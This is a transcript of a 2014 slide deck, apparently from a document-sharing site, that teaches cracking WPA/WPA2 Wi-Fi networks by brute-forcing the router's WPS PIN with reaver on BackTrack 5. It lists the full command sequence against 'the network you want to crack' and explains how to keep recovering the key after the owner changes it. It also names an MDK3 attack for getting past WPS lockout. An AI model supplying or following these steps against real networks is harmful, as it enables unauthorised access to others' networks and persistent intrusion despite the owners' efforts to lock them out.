cracking WPA/WPA2 encrypted Wi-fi network using backtrack
19
Presentator : Bidhan Ghimire 23 rd December 2014
-
Upload
bidhan-ghimire -
Category
Education
-
view
208 -
download
6
Transcript of cracking WPA/WPA2 encrypted Wi-fi network using backtrack
Presentator :Bidhan Ghimire
23rd December 2014
WPA(Wi-fi protected Access) security standard introduced in 2003. makes the network more secure than by WEP.
WPS(wifi protected set up) accessing a network requires PSK(pre shared key) WPS pin allows user to connect to the network even without
knowing security key(PSK). WPS pin is a 8 digit pin at the sticker of the router WPS pin of a network can be found by brute attack if WPS is
"NOT LOCKED". once we know the WPS pin we can get the PSK for life time no
matter how many times the psk is changed.
Encryption in wi-fi
ISO file of Bactrack5R3
Vmware(optional)
External wifi reciever (as per requirement)
Tools for cracking WPA/WPA2
Operating system based on ubuntu/linux distribution aimed at penetration testing use
The current version of backtrack is BACKTRACK 5 revision 3 shortened as BT5R3
Backtrack
Boot into the backtrack using any method(live CD,VMware,ISO file on your computer
BEFORE STARTING THE ATTACK……
TYPE startx
Type iwconfig
Gather information about your wifi adapter
Type airmon-ng start wlan0
Enable the monitor mode
Type wash -i interface(mon0 here)
Search the network you want to crack
Type airodump-ng mon0
Alternatively,
From the list of
access points note the BSSID and the
channel of the network you want
to crack
reaver -i mon0 -b A1:B2:C3:D4:E5(bssid of the
network) -c (channel of the network) -vv
Do the reaver attack
Keep quiet until the reaver gives you the WPS pin
and PSK of the target AP.
KEEP QUIET FOR 3 T0 8 HOURS
Note the WPS pin , PSK & BSSID of the network you cracked.
you can use them to recover the PSK if the owner changes the PSK later
After the attack
Type reaver -i mon0 -b BSSID -c channel --pin=(pin you noted after cracking) -vv
Recovering the PSK(if changed)
SOME NEWEST ROUTER COMES WITH THE SPECIAL FEATURE THAT LOCKS THE WPS AUTOMATICALLY AFTER 10 WRONG PIN ENTRIES
IN THAT CASE YOU MIGHT SEE”AP RATE LIMITING”
WPS LOCKED
WPS locked condition can be solved to some extend by MDK3 attack
Solution to “WPS LOCKED”
![[1 2013]Hack Pass Wifi(WEP WPA WPA2)](https://static.fdocuments.net/doc/165x107/55cf93c0550346f57b9e44f2/1-2013hack-pass-wifiwep-wpa-wpa2.jpg)
